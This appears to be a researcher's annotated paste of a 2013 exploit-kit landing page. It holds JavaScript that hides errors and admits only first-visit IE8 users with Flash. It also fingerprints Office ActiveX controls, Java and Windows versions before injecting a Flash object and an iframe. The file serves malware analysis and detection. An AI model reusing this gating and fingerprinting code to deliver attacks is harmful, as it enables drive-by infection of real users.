StopMalvertising

exploit.html

Jan 8th, 2013
  1. https://twitter.com/PhysicalDrive0/statuses/288586871058100225
  2. 173.224.221.166
  3.  
  4. <html>
  5. <head>
  6.  
  7. <script language="JavaScript">
  8. <!--
  9.  
  // Global error handler. Returning true from window.onerror tells the browser
  // the error has been handled, so a script failure on this page (for example a
  // probe that throws) produces no visible error.
  // Analyst note: while this handler is installed, errors do not surface in the
  // browser UI, so a failed run looks the same as a blank page.
  10. function SymError()
  11. {
  12. return true;
  13. }
  14.  
  15. window.onerror = SymError;
  16.  
  17. //-->
  18. </script>
  19.  
  20. <script src=deployJava.js></script>
  21. <script type="text/javascript">
  // Returns the unescape()d cookie value that starts at character index
  // `offset` in document.cookie and runs up to the next ";" (or to the end of
  // the cookie string when no ";" follows).
  22. function getCookieVal (offset)
  23. {
  24. var endstr = document.cookie.indexOf (";", offset);
  25. if (endstr == -1)
  26. {
  // No terminating ";" found: the value is the last one in the string.
  27. endstr = document.cookie.length;
  28. }
  29. return unescape(document.cookie.substring(offset, endstr));
  30. }
  // Looks up the cookie called `name` in document.cookie.
  // Compares "name=" with the text at position i; on a match the value is read
  // with getCookieVal, otherwise i jumps to just past the next space.
  // Returns the value as a string, or null when the cookie is not present.
  31. function GetCookie (name)
  32. {
  33. var arg = name + "=";
  34. var alen = arg.length;
  35. var clen = document.cookie.length;
  36. var i = 0;
  37. while (i < clen)
  38. {
  39. var j = i + alen;
  40. if (document.cookie.substring(i, j) == arg)
  41. return getCookieVal (j);
  // indexOf returns -1 when no further space exists, so i becomes 0 and the
  // loop ends below.
  42. i = document.cookie.indexOf(" ", i) + 1;
  43. if (i == 0)
  44. break;
  45. }
  46. return null;
  47. }
  // Writes a cookie `name` = escape(value) to document.cookie.
  // Optional positional arguments 3 to 6 are read through SetCookie.arguments:
  // expires (toGMTString() is called on it, so a Date is expected), path,
  // domain and secure. Attributes that are null (or secure not true) are left
  // out of the cookie string.
  48. function SetCookie (name, value)
  49. {
  50. var argv = SetCookie.arguments;
  51. var argc = SetCookie.arguments.length;
  52. var expires = (2 < argc) ? argv[2] : null;
  53. var path = (3 < argc) ? argv[3] : null;
  54. var domain = (4 < argc) ? argv[4] : null;
  55. var secure = (5 < argc) ? argv[5] : false;
  56. document.cookie = name + "=" + escape (value) +
  57. ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
  58. ((path == null) ? "" : ("; path=" + path)) +
  59. ((domain == null) ? "" : ("; domain=" + domain)) +
  60. ((secure == true) ? "; secure" : "");
  61. }
  // Visit counter kept in a cookie named "visit".
  // Reads the current count (0 when the cookie is absent), increments it,
  // stores it again with path "/" and an expiry seven days from now, and
  // returns the new count. The caller at listing line 100 uses the result to
  // turn away any visit after the first.
  62. function DisplayInfo()
  63. {
  64. var expdate = new Date();
  65. var visit;
  // 24 * 60 * 60 * 1000 * 7 ms = seven days.
  66. expdate.setTime(expdate.getTime() + (24 * 60 * 60 * 1000*7 ));
  67. if(!(visit = GetCookie("visit")))
  68. visit = 0;
  // GetCookie returns a string; ++ converts it to a number.
  69. visit++;
  70. SetCookie("visit", visit, expdate, "/", null, false);
  71. return visit;
  72. }
  // Visitor gating, executed while the page is parsed. Every failed check below
  // sends the browser to about:blank, so only visitors that pass all four gates
  // stay on the page.
  // Analyst note: a crawler or sandbox that fails any gate is navigated to a
  // blank page, so a blank result does not mean the page is benign.
  // NOTE(review): assigning location.href does not by itself stop the
  // statements that follow; confirm in a sandbox how far execution continues
  // before the navigation takes effect.
  73. var ua = window.navigator.userAgent.toLowerCase();
  74.  
  // Gate 1: the user agent must contain "msie 8.0" (Internet Explorer 8).
  75. if (ua.indexOf('msie 8.0') <0)
  76. {
  77. location.href="about:blank";
  78. }
  79.  
  // Gate 2: the Flash ActiveX control must instantiate. If the constructor
  // throws, f keeps the number 0 and typeof f is "number" instead of "object".
  80. var f = 0;
  81. try {
  82. f = new ActiveXObject('ShockwaveFlash.ShockwaveFlash');
  83. }
  84. catch (e) {
  85. }
  86. var g=typeof f;
  87.  
  88. if(g!="object")
  89. {
  90. location.href="about:blank";
  91. }
  // Gate 3: navigator.systemLanguage (an IE-specific property) must be one of
  // zh-cn, en-us, zh-tw, ja or ru.
  92. var h=navigator.systemLanguage.toLowerCase();
  93.  
  94. if(h!="zh-cn" && h!="en-us" && h!= "zh-tw"&& h!= "ja" && h!= "ru" )
  95. {
  96.  
  97. location.href="about:blank";
  98. }
  99.  
  // Gate 4: first visit only. DisplayInfo() increments the "visit" cookie, so
  // any later visit within the cookie's seven-day lifetime gets about:blank.
  // Analyst note: re-fetching with the same cookie jar will not reproduce the
  // original behaviour; use a clean browser profile for each analysis run.
  100. var num=DisplayInfo();
  101. if(num >1)
  102. {
  103. location.href="about:blank";
  104. }
  // download(): invoked from <body onload>. Sends an asynchronous GET for
  // "xsainfo.jpg" and, once it completes with HTTP 200, chooses a branch from
  // the Windows version token in the user agent. Every branch writes a marker
  // into the hidden #test element and appends a Flash <object> for "today.swf"
  // plus an <iframe> for "news.html" to the document body.
  //
  // The response body of xsainfo.jpg is never read here; only readyState and
  // status are checked.
  // All four branches append identical markup and differ only in the #test
  // marker ("true", "false", "default", "cat"). Presumably today.swf or
  // news.html reads that marker; neither file is shown on this page, so confirm
  // against them.
  // Resource names visible in this page, usable for content signatures or
  // proxy-log searches: deployJava.js, xsainfo.jpg, today.swf, news.html.
  105. function download()
  106. {
  107. var xmlhttp;
  108. try
  109. {
  110. xmlhttp = new XMLHttpRequest();
  111. }
  112. catch (e)
  113. {
  // No native XMLHttpRequest: try the MSXML ProgIDs in order and stop at the
  // first one that instantiates.
  114. var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0','MSXML2.XMLHTTP.4.0','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP','Microsoft.XMLHTTP' );
  115. var success = false;
  116. for (var i=0;i < XMLHTTP_IDS.length && !success; i++)
  117. {
  118. try
  119. {
  120. xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]);
  121. success = true;
  122. } catch (e)
  123. {}
  124. }
  125. }
  // Ready-state handler; acts only when the request is complete (readyState 4)
  // and the status is 200.
  126. function callback()
  127. {
  128. if(xmlhttp.readyState==4)
  129. {
  130. if(xmlhttp.status==200)
  131. {
  // Spaces are stripped so "windows nt 6.1" can be matched as "nt6.1".
  132. var temp=ua.replace(/ /g,"");
  // Windows NT 6.1 branch (Windows 7).
  133. if (temp.indexOf("nt6.1")>-1) {
  134.  
  135.  
  // Probe two SharePoint.OpenDocuments ActiveX ProgIDs. ma / mb stay 0
  // (typeof "number") when the control cannot be created.
  // NOTE(review): these ProgIDs ship with Microsoft Office, so this looks like
  // an Office-version fingerprint; confirm.
  136. var key = "";
  137. var ma = 0;
  138. try {
  139. ma = new ActiveXObject("SharePoint.OpenDocuments.4");
  140. }
  141. catch (e) {
  142. }
  143. var mb = 0;
  144. try {
  145. mb = new ActiveXObject("SharePoint.OpenDocuments.3");
  146. }
  147. catch (e) {
  148. }
  149.  
  // Both controls present -> "girl"; only the .3 control -> "boy"; any other
  // combination leaves key empty.
  150. if ((typeof ma) == "object" && (typeof mb) == "object") {
  151. key = "girl";
  152. }
  153. else if ((typeof ma) == "number" && (typeof mb) == "object") {
  154. key = "boy";
  155. }
  156.  
  157.  
  158. if (key == "girl") {
  159.  
  // classid D27CDB6E-AE6D-11cf-96B8-444553540000 is the Flash Player ActiveX
  // control.
  160. document.getElementById('test').innerHTML="true";
  161. document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  162.  
  163. }
  164. if (key == "boy") {
  165. document.getElementById('test').innerHTML="false";
  166. document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  167.  
  168. }
  169.  
  // Neither SharePoint combination matched: continue only when
  // deployJava.versionCheck reports Java 1.6.0+ but not 1.7.0+.
  170. if (key == "") {
  171. if ((deployJava.versionCheck('1.6.0+') == true) && (deployJava.versionCheck('1.7.0+') == false)) {
  172.  
  173.  
  174. document.getElementById('test').innerHTML="default";
  175. document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  176.  
  177. }
  178. }
  179. }
  // Windows NT 5.1 branch (Windows XP): no further probing before the markup
  // is appended.
  180. if(temp.indexOf("nt5.1")>-1)
  181. {
  182.  
  183. document.getElementById('test').innerHTML="cat";
  184. document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  185.  
  186. }
  187.  
  188.  
  189. }
  190. }
  191. }
  // Asynchronous GET (third argument true); callback runs on each ready-state
  // change.
  192. xmlhttp.open("get", "xsainfo.jpg", true);
  193. xmlhttp.onreadystatechange = callback;
  194. xmlhttp.send(null);
  195. }
  196.  
  197. </script>
  198. </head>
  <!-- download() runs once the document has loaded. The #test div sits inside
       a display:none wrapper, starts as "hello", and is overwritten by the
       callback in download() with the marker of the branch that was taken. -->
  199. <body onload="download()">
  200. <div style=display:none>
  201. <div id=test>hello</div>
  202. </div>
  203. </body>
  204. </html>